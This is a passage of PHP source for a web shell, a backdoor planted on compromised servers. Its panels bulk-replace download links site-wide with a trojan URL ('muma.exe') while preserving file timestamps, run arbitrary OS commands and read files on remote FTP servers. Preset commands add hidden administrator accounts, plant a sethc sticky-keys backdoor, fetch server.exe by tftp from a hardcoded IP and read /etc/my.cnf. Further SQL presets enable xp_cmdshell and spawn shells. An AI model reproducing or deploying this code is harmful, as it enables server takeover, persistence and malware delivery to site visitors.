<div class="actall" style="height:50px;"><input type="radio" name="qb" value="a" checked>applied to current folder,subfolders and files
<br><input type="radio" name="qb" value="b">only applied to current folder</div>
<div class="actall"><input class="bt" type="button" value="begin" onclick="autoup();"></div>
</form>
END;
	return true;
}

//bulk replace

function Tihuan_Auto($tp,$tt,$th,$tca,$tcb,$td,$tb)
{
	if(($h_d = @opendir($tp)) == NULL) return false;
	while(false !== ($Filename = @readdir($h_d)))
	{
		if($Filename == '.' || $Filename == '..') continue;
		$Filepath = File_Str($tp.'/'.$Filename);
		if(is_dir($Filepath) && $tb) Tihuan_Auto($Filepath,$tt,$th,$tca,$tcb,$td,$tb);
		$doing = false;
		if(eregi($tt,$Filename))
		{
			$ic = File_Read($Filepath);
			if($th)
			{
				if(!stristr($ic,$tca)) continue;
				$ic = str_replace($tca,$tcb,$ic);
				$doing = true;
			}
			else
			{
				preg_match_all("/\<a href\=\"([^~]*?)\"/i",$ic,$nc);
				for($i = 0;$i < count($nc[1]);$i++){if(eregi($tca,$nc[1][$i])){$ic = str_replace($nc[1][$i],$tcb,$ic);$doing = true;}}
			}
			if($td) $ftime = @filemtime($Filepath);
			if($doing) echo File_Write($Filepath,$ic,'wb') ? 'ok:'.$Filepath.'<br>'."\r\n" : 'err:'.$Filepath.'<br>'."\r\n";
			if($td) @touch($Filepath,$ftime);
			ob_flush();
			flush();
		}
	}
	@closedir($h_d);
	return true;
}

function Tihuan_d()
{
	if((!empty($_POST['tp'])) && (!empty($_POST['tt'])))
	{
		$tt = str_replace('.','\\.',$_POST['tt']);
		$td = isset($_POST['td']) ? true : false;
		$tb = ($_POST['tb'] == 'a') ? true : false;
		$th = ($_POST['th'] == 'a') ? true : false;
		if($th) $_POST['tca'] = str_replace('.','\\.',$_POST['tca']);
		echo Tihuan_Auto($_POST['tp'],$tt,$th,$_POST['tca'],$_POST['tcb'],$td,$tb) ? 'Done' : 'Abort';
		echo '<br><input class="bt" type="button" value="back" onclick="window.location=\'?s=d\'">';
		return false;
	}
	$FILE_DIR = File_Str(dirname(__FILE__));
	$ROOT_DIR = File_Mode();
print<<<END
<script language="javascript">
function Fulllll(i){
	if(i==0) return false;
  Str = new Array(5);
  if(i <= 2){Str[1] = "{$ROOT_DIR}";Str[2] = "{$FILE_DIR}";tform.tp.value = Str[i];}
	else{Str[3] = ".htm|.html|.shtml";Str[4] = ".htm|.html|.shtml|.asp|.php|.jsp|.cgi|.aspx|.do";Str[5] = ".js";tform.tt.value = Str[i];}
  return true;
}
function showth(th){
	if(th == 'a') document.getElementById('setauto').innerHTML = '<tr>Searchment</tr> <textarea name="tca" id="tca" style="width:610px;height:100px;"></textarea><br>Replacement <textarea name="tcb" id="tcb" style="width:610px;height:100px;"></textarea>';
	if(th == 'b') document.getElementById('setauto').innerHTML = '<br><tr>Download Suffix</tr> <input type="text" name="tca" id="tca" value=".exe|.z0|.rar|.zip|.gz|.torrent" style="width:500px;"><br><br>&nbsp&nbsp&nbspReplacement&nbsp&nbsp&nbsp<input type="text" name="tcb" id="tcb" value="http://www.baidu.com/download/muma.exe" style="width:500px;">';
	return true;
}
function autoup(){
	if(document.getElementById('tp').value == ''){alert('path can not be empty');return false;}
	if(document.getElementById('tt').value == ''){alert('type can not be empty');return false;}
	if(document.getElementById('tca').value == '' || document.getElementById('tcb').value == ''){alert('replacement can not be empty');return false;}
	document.getElementById('tform').submit();
}
</script>
<form method="POST" name="tform" id="tform" action="?s=d">
<div class="actall" style="height:35px;">Path: <input type="text" name="tp" id="tp" value="{$ROOT_DIR}" style="width:500px;">
<select onchange='return Fulllll(options[selectedIndex].value)'>
<option value="0" selected>--select range--</option>
<option value="1">site root folder</option>
<option value="2">current folder</option>
</select></div>
<div class="actall" style="height:35px;">Type: <input type="text" name="tt" id="tt" value=".htm|.html|.shtml" style="width:500px;">
<select onchange='return Fulllll(options[selectedIndex].value)'>
<option value="0" selected>--select type--</option>
<option value="3">html</option>
<option value="4">script+html</option>
<option value="5">js</option>
</select></div>
<div class="actall" style="height:235px;"><input type="radio" name="th" value="a" onclick="showth('a')" checked>Designated Content Of The Repalce File <input type="radio" name="th" value="b" onclick="showth('b')">Download Url Of The Replace File<br>
<div id="setauto">Searchment:&nbsp <textarea name="tca" id="tca" style="width:610px;height:100px;"></textarea><br>Replacement: <textarea name="tcb" id="tcb" style="width:610px;height:100px;"></textarea></div></div>
<div class="actall" style="height:30px;"><input type="checkbox" name="td" value="1" checked>keep file time unchanged</div>
<div class="actall" style="height:50px;"><input type="radio" name="tb" value="a" checked>applied to current folder,subfolders and files
<br><input type="radio" name="tb" value="b">only applied to current folder</div>
<div class="actall"><input class="bt" type="button" value="Begin" onclick="autoup();"></div>
</form>
END;
	return true;
}

//clean trojan

function Antivirus_Auto($sp,$features,$st)
{
	if(($h_d = @opendir($sp)) == NULL) return false;
	$ROOT_DIR = File_Mode();
	while(false !== ($Filename = @readdir($h_d)))
	{
		if($Filename == '.' || $Filename == '..') continue;
		$Filepath = File_Str($sp.'/'.$Filename);
		if(is_dir($Filepath)) Antivirus_Auto($Filepath,$features,$st);
		if(eregi($st,$Filename))
		{
			if($Filepath == File_Str(__FILE__)) continue;
			$ic = File_Read($Filepath);
			foreach($features as $var => $key)
			{
				if(stristr($ic,$key))
				{
					$Fileurls = str_replace($ROOT_DIR,'http://'.$_SERVER['SERVER_NAME'].'/',$Filepath);
					$Filetime = @date('Y-m-d H:i:s',@filemtime($Filepath));
					echo '<a href="'.$Fileurls.'" target="_blank"><font color="#FF0000">'.$Filepath.'</font></a><br>��<a href="?s=e&fp='.urlencode($sp).'&fn='.$Filename.'&dim='.urlencode($key).'" target="_blank">Edit</a> <a href="?s=e&df='.urlencode($Filepath).'" target="_blank">Del</a>�� ';
					echo '��'.$Filetime.'�� <font color="#FF0000">'.$var.'</font><br><br>';
					break;
				}
			}
			ob_flush();
			flush();
		}
	}
	@closedir($h_d);
	return true;
}

function Antivirus_e()
{
	if(!empty($_GET['df'])){echo $_GET['df'];if(@unlink($_GET['df'])){echo ' <font style=font:11pt color=ff0000>del successfully</font>';}else{@chmod($_GET['df'],0666);echo @unlink($_GET['df']) ? ' <font style=font:11pt color=ff0000>del successfully</font>' : ' <font style=font:11pt color=ff0000>del faild</font>';} return false;}
	if((!empty($_GET['fp'])) && (!empty($_GET['fn'])) && (!empty($_GET['dim']))) { File_Edit($_GET['fp'],$_GET['fn'],$_GET['dim']); return false; }
	$SCAN_DIR = (File_Mode() == '') ? File_Str(dirname(__FILE__)) : File_Mode();
	$features_php = array('ftp.class.php'=>'ftp.class.php','cha88.cn'=>'cha88.cn','Security Angel Team'=>'Security Angel Team','read()'=>'->read()','readdir'=>'readdir(','return string soname'=>'returns string soname','eval()'=>'eval(gzinflate(','eval(base64_decode())'=>'eval(base64_decode(','eval($_POST)'=>'eval($_POST','eval($_REQUEST)'=>'eval($_REQUEST','eval ($_)'=>'eval ($_','copy()'=>'copy($_FILES','copy ()'=>'copy ($_FILES','move_uploaded_file()'=>'move_uploaded_file($_FILES','move_uploaded_file ()'=>'move_uploaded_file ($_FILES','str_replace()'=>'str_replace(\'\\\\\',\'/\',');
	$features_asx = array('����·��'=>'����·��','�����������'=>'�����������','fso.createtextfile()'=>'fso.createtextfile(path,true)','<%execute(request())%>'=>'<%execute(request','<%eval request()%>'=>'<%eval request','execute session()'=>'execute session(','--Created!'=>'--Created!','WScript.Shell'=>'WScript.Shell','<%s LANGUAGE = VBScript.Encode %>'=>'<%@ LANGUAGE = VBScript.Encode %>','www.rootkit.net.cn'=>'www.rootkit.net.cn','Process.GetProcesses'=>'Process.GetProcesses','lake2'=>'lake2');
print<<<END
<div class="actall" style="height:100px;"><form method="POST" name="tform" id="tform" action="?s=e">
Path: <input type="text" name="sp" id="sp" value="{$SCAN_DIR}" style="width:400px;">
<select name="st">
<option value="php">phpshell</option>
<option value="asx">aspshell+aspxshell</option>
<option value="ppp">phpshell+aspshell+aspxshell</option>
</select>
<input class="bt" type="submit" value="Scan">
</form><br>
END;
	if(!empty($_POST['sp']))
	{
		if($_POST['st'] == 'php'){$features_all = $features_php; $st = '\.php|\.inc|\.php4|\.php3|\._hp|\;';}
		if($_POST['st'] == 'asx'){$features_all = $features_asx; $st = '\.asp|\.asa|\.cer|\.aspx|\.ascx|\.cdx|\;';}
		if($_POST['st'] == 'ppp'){$features_all = array_merge($features_php,$features_asx); $st = '\.php|\.inc|\.php4|\.php3|\._hp|\.asp|\.asa|\.cer|\.cdx|\.aspx|\.ascx|\;';}
		echo Antivirus_Auto($_POST['sp'],$features_all,$st) ? 'Done' : 'Abort';
	}
	echo '</div>';
	return true;
}
//search file
function Findfile_Auto($sfp,$sfc,$sft,$sff,$sfb)
{
	//echo $sfp.'<br>'.$sfc.'<br>'.$sft.'<br>'.$sff.'<br>'.$sfb;
	if(($h_d = @opendir($sfp)) == NULL) return false;
	while(false !== ($Filename = @readdir($h_d)))
	{
		if($Filename == '.' || $Filename == '..') continue;
		if(eregi($sft,$Filename)) continue;
		$Filepath = File_Str($sfp.'/'.$Filename);
		if(is_dir($Filepath) && $sfb) Findfile_Auto($Filepath,$sfc,$sft,$sff,$sfb);
		if($sff)
		{
			if(stristr($Filename,$sfc))
			{
				echo '<a target="_blank" href="?s=p&fp='.urlencode($sfp).'&fn='.urlencode($Filename).'"> '.$Filepath.' </a><br>'."\r\n";
				ob_flush();
				flush();
			}
		}
		else
		{
			$File_code = File_Read($Filepath);
			if(stristr($File_code,$sfc))
			{
				echo '<a target="_blank" href="?s=p&fp='.urlencode($sfp).'&fn='.urlencode($Filename).'"> '.$Filepath.' </a><br>'."\r\n";
				ob_flush();
				flush();
			}
		}
	}
	@closedir($h_d);
	return true;
}

function Findfile_j()
{
	if(!empty($_GET['df'])){echo $_GET['df'];if(@unlink($_GET['df'])){echo '<font style=font:11pt color=ff0000>del successfully</font>';}else{@chmod($_GET['df'],0666);echo @unlink($_GET['df']) ? '<font style=font:11pt color=ff0000>del successfully</font>' : '<font style=font:11pt color=ff0000>del faild</font>';} return false;}
	if((!empty($_GET['fp'])) && (!empty($_GET['fn'])) && (!empty($_GET['dim']))) { File_Edit($_GET['fp'],$_GET['fn'],$_GET['dim']); return false; }
	$SCAN_DIR = isset($_POST['sfp']) ? $_POST['sfp'] : File_Mode();
	$SCAN_CODE = isset($_POST['sfc']) ? $_POST['sfc'] : 'config';
	$SCAN_TYPE = isset($_POST['sft']) ? $_POST['sft'] : '.mp3|.mp4|.avi|.swf|.jpg|.gif|.png|.bmp|.gho|.rar|.exe|.zip';
print<<<END
<form method="POST" name="jform" id="jform" action="?s=u">
<div class="actall">Scan Path <input type="text" name="sfp" value="{$SCAN_DIR}" style="width:600px;"></div>
<div class="actall">&nbspFile Filter&nbsp <input type="text" name="sft" value="{$SCAN_TYPE}" style="width:600px;"></div>
<div class="actall">Keywords <input type="text" name="sfc" value="{$SCAN_CODE}" style="width:395px;">
<input type="radio" name="sff" value="a" checked>search filename 
<input type="radio" name="sff" value="b">search include keywords</div>
<div class="actall" style="height:50px;"><input type="radio" name="sfb" value="a" checked>applied to current folder,subfolders and files
<br><input type="radio" name="sfb" value="b">only applied to current folder</div>
<div class="actall"><input class="bt" type="submit" value="scan" style="width:80px;"></div>
</form>
END;
	if((!empty($_POST['sfp'])) && (!empty($_POST['sfc'])))
	{
		echo '<div class="actall">';
		$_POST['sft'] = str_replace('.','\\.',$_POST['sft']);
		$sff = ($_POST['sff'] == 'a') ? true : false;
		$sfb = ($_POST['sfb'] == 'a') ? true : false;
		echo Findfile_Auto($_POST['sfp'],$_POST['sfc'],$_POST['sft'],$sff,$sfb) ? '<font style=font:11pt color=ff0000>Done</font>' : '<font style=font:11pt color=ff0000>Error</font>';
		echo '</div>';
	}
	return true;
}
//ftp connect
function filecollect($dir,$filelist) {
   $files = ftp_nlist($conn,$dir); 
   return $files;
   }
function ftp_php(){
$dir = "";
$ftphost = isset($_POST['ftphost']) ? $_POST['ftphost'] : '127.0.0.1';
$ftpuser = isset($_POST['ftpuser']) ? $_POST['ftpuser'] : 'root';
$ftppass = isset($_POST['ftppass']) ? $_POST['ftppass'] : 'root';
$ftplist = isset($_POST['list']) ? $_POST['list'] : '';
$ftpfolder = isset($_POST['ftpfolder']) ? $_POST['ftpfolder'] : '/';
$ftpfolder = strtr($ftpfolder,"\\","/");
$files = isset($_POST['readfile']) ? $_POST['readfile'] : '';
print<<<END
<br><br><div class="actall"><h5>connect ftp server with php</h5><br></div>
<form method="POST" name="" action=""><br>
<div class="actall">Host:<input type="text" name="ftphost" value="{$ftphost}" style="width:100px">
User:<input type="text" name="ftpuser" value="{$ftpuser}" style="width:100px">
Pass:<input type="text" name="ftppass" value="{$ftppass}" style="width:100px"><br><br>
<input type="hidden" name="readfile" value="" style="width:200px">
folder:<input type="text" name="ftpfolder" value="{$ftpfolder}" style="width:200px">
<input type="hidden" name="list" value="list">
<input class="bt" type="submit" name="list" value="list" style="width:40px"><br><br></form></div>
END;
if($ftplist == 'list'){
$conn = @ftp_connect($ftphost) or die("could not connect to ftp server");
    if(@ftp_login($conn,$ftpuser,$ftppass)){
    $filelists = @ftp_nlist( $conn, $ftpfolder );
    echo "<pre>";
    echo "current folder is <font color='#FF0000'>$ftpfolder</font>:<br>";
    if(is_array($filelists))
    {
    foreach ($filelists as $file)
    {
       $file = strtr($file,"\\","/");
       $size_file =@ftp_size($conn, $file);
       if ( $size_file == -1)
           {
           $a=$a.basename($file)."<br>";
           }
       else
           {
           $b=$b.basename($file)."				".$size_file."B</br>";
           }
    }
    }
    echo $a;
    echo $b;
    echo "</pre>";
    }
    }
print<<<END
<form method="POST" name="" action="" >
<div class="actall">filename:<input type="text" name="readfile" value="{$files}" style="width:200px">
<input type="hidden" name="read" value="read">
<input class="bt" type="submit" name="read" value="read" style="width:40px"><br><br></form></div>
END;
$readaction = isset($_POST['read']) ? $_POST['read'] : '';
if ($readaction == 'read') {
    $handle = @file_get_contents("ftp://$ftpuser:$ftppass@$ftphost/$files", "r");
    $handle = htmlspecialchars($handle);
    $handle = str_replace("\n", "<br>", $handle);
    echo "the content of <font color='#FF0000'>$files</font> is:<br><br>";
    echo $handle;
    }
print<<<END
<form method="post" enctype="multipart/form-data" name="" action="">
<div class="actall">folder:<input type="text" name="cdir" value="{$cdir}" style="width:100px">
<input type="file" name="upload" value="upload" style="width:200px;height:22px;">
<input type="hidden" name="upfile" value="upfile">
<input class="bt" type="submit" name="submit" value="upfile" style="width:40px"><br><br></form></div>
END;
$upaction = isset($_POST['upfile']) ? $_POST['upfile'] : '' ;    
if ($upaction == 'upfile') {
    $cdir = isset($_POST['cdir']) ? $_POST['cdir'] : '/';
    $conn = @ftp_connect($ftphost) or die("could not connect to ftp server");
    if(@ftp_login($conn,$ftpuser,$ftppass)){
        @ftp_chdir($conn, $cdir);
        $res_code = @ftp_put($conn,$_FILES['upload']['name'],$_FILES['upload']['tmp_name'], FTP_BINARY,0);
        if (empty($res_code)){
            echo '<font color="#FF67A0">ftp upload faild</font><br>';
            }
         else{
             echo '<font color="#FF67A0">ftp upload successful</font><br>';
             } 
        }
    }
print<<<END
<form method="POST" enctype="multipart/form-data" name="" action="">
<div class="actall">path:<input type="text" name="downfile" value="{$getfile}" style="width:100px">
<input type="hidden" name="getfile" value="down">
<input class="bt" type="submit" name="down" value="down" style="width:40px"><br><br></form></div>
END;
$getfile = isset($_POST['downfile']) ? $_POST['downfile'] : '';
$getaction = isset($_POST['getfile']) ? $_POST['getfile'] : '';   
if ($getaction == 'down' && $getfile !=''){
function php_ftp_download($filename){   
global $ftphost,$ftpuser,$ftppass;              
  $ftp_path = dirname($filename)   .   "/";         
  $select_file = basename($filename);        
  $ftp = @ftp_connect($ftphost);        
  if($ftp){   
        if(@ftp_login($ftp, $ftpuser, $ftppass)){        
        if(@ftp_chdir($ftp,$ftp_path))   {                              
        $tmpfile = tempnam(getcwd(),"temp");
        if(ftp_get($ftp,$tmpfile,$select_file,FTP_BINARY)){       
          ftp_quit($ftp);      
          header("Content-Type:application/octet-stream");   
          header("Content-Disposition:attachment;  filename=" . $select_file);   
          unlink($tmpfile); 
          exit;   
          }   
         }   
          }   
      }   
      ftp_quit($ftp);   
  }
php_ftp_download($getfile); 
}
}
//server info

function Info_Cfg($varname){switch($result = get_cfg_var($varname)){case 0: return "No"; break; case 1: return "Yes"; break; default: return $result; break;}}
function Info_Fun($funName){return (false !== function_exists($funName)) ? "Yes" : "No";}
function Info_f()
{
	$dis_func = get_cfg_var("disable_functions");
	$upsize = get_cfg_var("file_uploads") ? get_cfg_var("upload_max_filesize") : "upfile forbidden";
	$adminmail = (isset($_SERVER['SERVER_ADMIN'])) ? "<a href=\"mailto:".$_SERVER['SERVER_ADMIN']."\">".$_SERVER['SERVER_ADMIN']."</a>" : "<a href=\"mailto:".get_cfg_var("sendmail_from")."\">".get_cfg_var("sendmail_from")."</a>";
	if($dis_func == ""){$dis_func = "No";}else{$dis_func = str_replace(" ","<br>",$dis_func);$dis_func = str_replace(",","<br>",$dis_func);}
	$phpinfo = (!eregi("phpinfo",$dis_func)) ? "Yes" : "No";
	$info = array(
		array("server time",date("Y-m-d h:i:s",time())),
		array("server domain","<a href=\"http://".$_SERVER['SERVER_NAME']."\" target=\"_blank\">".$_SERVER['SERVER_NAME']."</a>"),
		array("server ip",gethostbyname($_SERVER['SERVER_NAME'])),
		array("server os",PHP_OS),
		array("server os language",$_SERVER['HTTP_ACCEPT_LANGUAGE']),
		array("server powerby",$_SERVER['SERVER_SOFTWARE']),
		array("your IP",getenv('REMOTE_ADDR')),
		array("server port",$_SERVER['SERVER_PORT']),
		array("php run mode",strtoupper(php_sapi_name())),
		array("php ver",PHP_VERSION),
		array("run in safe mode",Info_Cfg("safemode")),
		array("server administrator",$adminmail),
		array("current file path",__FILE__),
		array("allow_url_fopen",Info_Cfg("allow_url_fopen")),
		array("enable load dll",Info_Cfg("enable_dl")),
		array("display_errors",Info_Cfg("display_errors")),
		array("register_globals",Info_Cfg("register_globals")),
		array("magic_quotes_gpc",Info_Cfg("magic_quotes_gpc")),
		array("memory_limit",Info_Cfg("memory_limit")),
		array("post_max_size",Info_Cfg("post_max_size")),
		array("upload_max_filesize",$upsize),
		array("max_execution_time",Info_Cfg("max_execution_time")."second"),
		array("disable_functions",$dis_func),
		array("phpinfo()",$phpinfo),
		array("free disk space",intval(diskfreespace(".") / (1024 * 1024)).'Mb'),
		array("GD Library",Info_Fun("imageline")),
		array("IMAP",Info_Fun("imap_close")),
		array("Mysql database",Info_Fun("mysql_close")),
		array("SyBase database",Info_Fun("sybase_close")),
		array("Oracle database",Info_Fun("ora_close")),
		array("Oracle 8 database",Info_Fun("OCILogOff")),
		array("PREL PCRE",Info_Fun("preg_match")),
		array("support PDF",Info_Fun("pdf_close")),
		array("Postgresql database",Info_Fun("pg_close")),
		array("SNMP",Info_Fun("snmpget")),
		array("Zlib",Info_Fun("gzclose")),
		array("parse XML",Info_Fun("xml_set_object")),
		array("FTP",Info_Fun("ftp_login")),
		array("ODBC",Info_Fun("odbc_close")),
		array("support Session",Info_Fun("session_start")),
		array("support Socket",Info_Fun("fsockopen")),
	);
	echo '<table width="100%" border="0">';
	for($i = 0;$i < count($info);$i++){echo '<tr><td width="40%">'.$info[$i][0].'</td><td>'.$info[$i][1].'</td></tr>'."\n";}
	echo '</table>';
	return true;
}

//execute command with php function
function Exec_Run($cmd)
{ 
        $res = '';
	if(function_exists('exec')){@exec($cmd,$res);$res = join("\n",$res);}
	elseif(function_exists('shell_exec')){$res = @shell_exec($cmd);}
	elseif(function_exists('system')){@ob_start();@system($cmd);$res = @ob_get_contents();@ob_end_clean();}
	elseif(function_exists('passthru')){@ob_start();@passthru($cmd);$res = @ob_get_contents();@ob_end_clean();}
	elseif(@is_resource($f = @popen($cmd,"r"))){$res = '';while(!@feof($f)){$res .= @fread($f,1024);}@pclose($f);}
	return $res;
}


function Exec_g()
{       
        echo '<br>';
	$res = 'back screen';
	$cmd = 'dir';
	if(!empty($_POST['cmd'])){$res = Exec_Run($_POST['cmd']);$cmd = $_POST['cmd'];}
print<<<END
<script language="javascript">
function sFull(i){
	Str = new Array(11);
	Str[0] = "ver";
        Str[1] = "path";
        Str[2] = "ipconfig /all";
        Str[3] = "whoami";
        Str[4] = "tasklist /svc";
        Str[5] = "netstat -an";
        Str[6] = "systeminfo";
	Str[7] = "net user";
        Str[8] = "net view";
        Str[9] = "net config workstation";
        Str[10] = "net config server";
	Str[11] = "net user b4che10r b4che10r /add & net localgroup administrators b4che10r /add";
	Str[12] = "query user";
	Str[13] = "copy c:\\1.php d:\\2.php";
        Str[14] = "copy c:\\windows\\explorer.exe c:\\windows\\system32\\sethc.exe & copy c:\\windows\\system32\\sethc.exe c:\\windows\\system32\\dllcache\\sethc.exe";
	Str[15] = "tftp -i 219.134.46.245 get server.exe c:\\\\server.exe";
        Str[16] = "ps -ef";
        Str[17] = "ifconfig";
        Str[18] = "cat /etc/syslog.conf";
        Str[19] = "cat /etc/my.cnf";
        Str[20] = "cat /etc/hosts";
        Str[21] = "cat /etc/services";
	document.getElementById('cmd').value = Str[i];
	return true;
}
</script>
<div class="actall"><form method="POST" name="gform" id="gform" action="?s=g">
Command: <input type="text" name="cmd" id="cmd" value="{$cmd}" style="width:369px;">
<select onchange='return sFull(options[selectedIndex].value)'>
<option value="0" selected>----Command Collection----</option>
<option value="1">path(win)</option>
<option value="2">ipconfig(win)</option>
<option value="3">whoami(win)</option>
<option value="4">tasklist(win)</option>
<option value="5">port view</option>
<option value="6">systeminfo(win)</option>
<option value="7">net user(win)</option>
<option value="8">net view(win)</option>
<option value="9">net config workstation(win)</option>
<option value="10">net config server(win)</option>
<option value="11">add administrators(win)</option>
<option value="12">query user(win)</option>
<option value="13">copy file(win)</option>
<option value="14">shift backdoor(win)</option>
<option value="15">FTP download(win)</option>
<option value="16">ps(linux)</option>
<option value="17">ifconfig(linux)</option>
<option value="18">syslog.conf(linux)</option>
<option value="19">my.cnf(linux)</option>
<option value="20">hosts(linux)</option>
<option value="21">services(linux)</option>

</select>
<input class="bt" type="submit" value="execute" ></div>
<div class="actall"><textarea name="show" style="width:720px;height:450px;">{$res}</textarea></div>
</form>
END;
	return true;
}

//api

function Com_h()
{
	$object = isset($_GET['o']) ? $_GET['o'] : 'adodb';
	$com = array("adodb" => "ADODB.Connection","wscript" => "WScript.shell","application" => "Shell.Application");
print<<<END
<div class="actall"><a href="?s=h&o=adodb">[ADODB.Connection]</a> 
<a href="?s=h&o=wscript">[WScript.shell]</a> 
<a href="?s=h&o=application">[Shell.Application]</a></div>
<div class="actall" style="height:200px;">
<form method="POST" name="hform" id="hform" action="?s=h&o={$object}"><br>
END;
	$shell = new COM($com[$object]);
if($object == 'wscript')
{
	$cmd = isset($_POST['cmd']) ? $_POST['cmd'] : 'dir';
        $cmdpath = isset($_POST['cmdpath']) ? $_POST['cmdpath'] : 'c:\\windows\\system32\\cmd.exe';
print<<<END
&nbspcmdpath:<input type="text" name="cmdpath" value="{$cmdpath}" style="width:600px;"><br>
command:<input type="text" name="cmd" value="{$cmd}" style="width:600px;">
<input class="bt" type="submit" value="execute"></form><br>
END;
	if(!empty($_POST['cmd']))
	{
                
		$exe = @$shell->exec("$cmdpath /c ".$cmd);
		$out = $exe->StdOut();
		$output = $out->ReadAll();
		echo '<pre>'.$output.'</pre>';
	}
}
elseif($object == 'application')
{
	$run = isset($_POST['run']) ? $_POST['run'] : 'cmd.exe';
	$cmd = isset($_POST['cmd']) ? $_POST['cmd'] : 'copy c:\windows\php.ini c:\php.ini';
print<<<END
Path:<br><input type="text" name="run" value="{$run}" style="width:600px;">
<br><br>Command argv:<br><input type="text" name="cmd" value="{$cmd}" style="width:600px;">
<br><br><input class="bt" type="submit" value="execute"></form><br>
END;
	if(!empty($_POST['run'])) echo (@$shell->ShellExecute($run,'/c '.$cmd) == '0') ? 'Done' : 'Faild';
}
elseif($object == 'adodb')
{
	$string = isset($_POST['string']) ? $_POST['string'] : '';
	$sql = isset($_POST['sql']) ? $_POST['sql'] : '';
print<<<END
<script language="javascript">
function hFull(i){
	if(i==0 || i==10) return false;
	Str = new Array(12);  
	Str[1] = "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=\db.mdb;Jet OLEDB:Database Password=***";
	Str[2] = "Driver={Sql Server};Server=localhost,1433;Database=DbName;Uid=sa;Pwd=sa";
	Str[3] = "Driver={MySql};Server=localhost;Port=3306;Database=DbName;Uid=root;Pwd=root";
	Str[4] = "Provider=OraOLEDB.Oracle.1;User ID=oracle;Password=oracle;Data Source=ORACLE;Persist Security Info=True;";
        Str[5] = "driver={IBM db2 odbc DRIVER};database=mydb;hostname=localhost;port=50000;protocol=TCPIP;uid=root; pwd=pass";
        Str[6] = "DRIVER={POSTGRESQL};SERVER=127.0.0.1;DATABASE=PostGreSQL;UID=postgresql;PWD=123456;";
        Str[7] = "Dsn='';Driver={INFORMIX 3.30 32 BIT};Host=myHostname;Server=myServerName;Service=myServiceName;Protocol=olsoctcp;Database=myDbName;UID=myUsername;PWD=myPassword";
	Str[8] = "DSN=mydns;Uid=username;Pwd=password";
        Str[9] = "FILEDNS=c:\\\path\\\db.dsn;Uid=username;Pwd=password";
        Str[11] = "SELECT * FROM [TableName] WHERE ID<100";
	Str[12] = "INSERT INTO [TableName](USER,PASS) VALUES('b4che10r','mypass')";
	Str[13] = "UPDATE [TableName] SET USER='b4che10r' WHERE ID=100";
	Str[14] = "CREATE TABLE [TableName](ID INT IDENTITY (1,1) NOT NULL,USER VARCHAR(50))";
	Str[15] = "DROP TABLE [TableName]";
	Str[16] = "ALTER TABLE [TableName] ADD COLUMN PASS VARCHAR(32)";
        Str[17] = "select shell('c:\windows\system32\cmd.exe /c net user b4che10r abc123 /add');";
        Str[18] = "EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;";
        Str[19] = "EXEC sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ole Automation Procedures',1;RECONFIGURE;";
        Str[20] = "EXEC sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ad Hoc Distributed Queries',1;RECONFIGURE;";
        Str[21] = "Use master dbcc addextendedproc ('xp_cmdshell','xplog70.dll')";
        Str[22] = "Use master dbcc addextendedproc ('sp_OACreate','odsole70.dll')";
        Str[23] = "Declare @s  int;exec sp_oacreate 'wscript.shell',@s out;Exec SP_OAMethod @s,'run',NULL,'cmd.exe /c echo '<?php phpinfo();?>' > c:\info.php';";
	Str[24] = "sp_makewebtask @outputfile='d:\\\web\\\test.php',@charset=gb2312,@query='select test';";
        Str[25] = "Exec master.dbo.xp_cmdshell 'ver';";
        Str[26] = "Select Name FROM Master..SysDatabases;";
        Str[27] = "select name from sysobjects where type='U';";
        Str[28] = "Select Name from SysColumns Where id=Object_Id('TableName');";
        Str[29] = "select username,password from dba_users;";
        Str[30] = "select TABLE_NAME from all_tables;";
        Str[31] = "desc admin;";
        Str[32] = "grant connect,resource,dba to user_name;";
        Str[33] = "select datname from pg_database;";
        Str[34] = "select relname from pg_stat_user_tables;";
        Str[35] = "\\\d table_name";
        Str[36] = "select pg_file_read('pg_hba.conf',1,pg_file_length('pg_hb.conf'));";
        Str[37] = "\\\! uname -a";
        Str[38] = "select schemaname from syscat.schemata;";
        Str[39] = "select name from sysibm.systables;";
        Str[40] = "select colname from syscat.columns where tabname='table_name';";
        Str[41] = "db2 get db cfg for db_name;";
        Str[42] = "select name from sysdatabases;";
        Str[43] = "select tabname from systables where tabid=n;";
        Str[44] = "select tabname,colname,owner,coltype from syscolumns join systables on syscolumns.tabid = systables.tabid;";
        Str[45] = "select username,usertype,password from sysusers;";
        if(i<=9){document.getElementById('string').value = Str[i];}else{document.getElementById('sql').value = Str[i];}
	return true;
}
</script>
conn strings:<br> <input type="text" name="string" id="string" value="{$string}" style="width:800px;">
<select onchange="return hFull(options[selectedIndex].value)">
<option value="0" selected>--select range--</option>
<option value="1">Access</option>
<option value="2">MsSql</option>
<option value="3">MySql</option>
<option value="4">Oracle</option>
<option value="5">DB2</option>
<option value="6">PostGreSQL</option>
<option value="7">Informix</option>
<option value="8">DSN</option>
<option value="9">FILEDSN</option>
<option value="10">--sql statement--</option>
<option value="11">show data</option>
<option value="12">insert data</option>
<option value="13">update data</option>
<option value="14">create table</option>
<option value="15">drop table</option>
<option value="16">add column</option>
<option value="17">access shell()</option>
<option value="18">add xp_cmdsehll(sql2005)</option>
<option value="19">add oacreate(sql2005)</option>
<option value="20">add openrowset(sql2005)</option>
<option value="21">add xp_cmdsehll(sql2000)</option>
<option value="22">add oacreate(sql2000)</option>
<option value="23">oamethod exec</option>
<option value="24">sp_makewebtask</option>
<option value="25">xp_cmdshell</option>
<option value="26">databases(sql)</option>
<option value="27">tables(sql)</option>
<option value="28">columns(sql)</option>
<option value="29">hashes(oracle)</option>
<option value="30">tables(oracle)</option>
<option value="31">columns(oracle)</option>
<option value="32">grant(oracle)</option>
<option value="33">databases(pgsql)</option>
<option value="34">tables(pgsql)</option>
<option value="35">columns(pgsql)</option>
<option value="36">pg_hba.conf(pgsql)</option>
<option value="37">os-command(pgsql)</option>
<option value="38">databases(db2)</option>
<option value="39">tables(db2)</option>
<option value="40">columns(db2)</option>
<option value="41">db config(db2)</option>
<option value="42">databases(informix)</option>
<option value="43">tables(informix)</option>
<option value="44">columns(informix)</option>
<option value="45">hashes(informix)</option>
</select>
<br><br>SQL Commnad:<br> <input type="text" name="sql" id="sql" value="{$sql}" style="width:800px;">
<input class="bt" type="submit" value="execute">
</form><br>
END;
	if(!empty($string))
	{
		@$shell->Open($string);
